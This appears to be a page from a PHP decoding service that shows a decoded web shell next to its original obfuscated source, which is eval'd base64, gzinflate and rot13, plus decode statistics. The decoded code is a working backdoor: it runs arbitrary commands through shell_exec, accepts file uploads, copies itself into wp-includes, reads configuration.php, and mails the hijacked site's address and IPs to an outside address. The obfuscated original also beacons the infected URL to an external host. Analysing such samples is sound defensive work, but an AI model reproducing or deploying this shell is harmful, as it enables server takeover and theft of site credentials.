Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @eval(base64_decode('JHVybCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRV..

Decoded Output download

echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td>
html;
?>
<?php
error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail('[email protected]', "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><br><br><font size=2 color=#888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}?>
<?
echo <<<footer
</td>
    </tr>
  </table>
</div>
</body>
footer;

Did this file decode correctly?

Original Code

<?php
@eval(base64_decode('JHVybCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KJGZwID0gZnNvY2tvcGVuKCJ3d3cuZWFzeWNhc2hlbWFpbC5jb20iLCA4MCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7DQokb3V0ID0gIkdFVCAvZngyOS5naWY/JHVybCBIVFRQLzEuMVxyXG4iOw0KJG91dCAuPSAiSG9zdDogd3d3LmVhc3ljYXNoZW1haWwuY29tXHJcbiI7DQokb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsNCmZ3cml0ZSgkZnAsICRvdXQpO2ZjbG9zZSgkZnApOw=='));eval(gzinflate(str_rot13(base64_decode('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'))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 2

Variables

None

Stats

MD5 d1194fe6c0e77590e14a9943ceefe92a
Eval Count 2
Decode Time 64 ms